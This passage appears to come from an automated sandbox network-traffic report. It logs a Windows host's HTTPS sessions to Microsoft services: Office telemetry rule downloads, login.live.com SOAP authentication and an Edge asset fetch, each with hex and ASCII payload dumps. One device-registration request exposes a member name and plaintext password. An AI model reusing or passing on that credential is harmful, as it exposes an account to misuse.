                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 50755ed9-801e-00ac-015e-27fd65000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210227Z-r197bdfb6b48v72xb403uy6hns0000000680000000001gca
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                42192.168.2.54981013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: fbaa75ab-301e-0020-3742-266299000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210227Z-17c5cb586f6hhlf5mrwgq3erx800000006r000000000fwmh
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                43192.168.2.54980913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: deaa19c2-701e-006f-33de-26afc4000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210227Z-17c5cb586f65j4snvy39m6qus400000000wg00000000a957
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                44192.168.2.54981113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2760be74-301e-0096-200b-26e71d000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210227Z-16849878b78q9m8bqvwuva4svc000000041g00000000nbg8
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                45192.168.2.54980720.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:28 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8c09f8b3-a312-4bef-8841-a6b68c78238c
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF0001B849 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 1276
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                46192.168.2.54981220.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 7642
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 65 71 65 71 78 6e 71 66 70 78 71 61 62 76 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 74 24 3f 54 3b 39 31 6f 6b 73 76 6c 39 73 41 4c 46 53 78 6c 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02eqeqxnqfpxqabv</Membername><Password>t$?T;91oksvl9sALFSxl</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:28 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C542_BL2
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 994d7af1-d9ae-4158-baa7-d67bf835eacc
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF0001D9C7 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:30 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 17166
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 34 30 31 30 33 44 46 34 45 37 44 30 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 32 34 61 65 36 36 66 32 2d 65 61 62 64 2d 34 37 30 65 2d 39 62 34 35 2d 35 63 34 30 35 64 62 39 66 64 66 31 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001840103DF4E7D0</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="24ae66f2-eabd-470e-9b45-5c405db9fdf1" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                                                                                                                Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                47192.168.2.54981913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 420
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 892d3b27-201e-005d-7649-27afb3000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210228Z-16849878b7867ttgfbpnfxt44s00000005cg00000000nkrt
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                48192.168.2.54982113.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Edge-Asset-Group: Shoreline
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
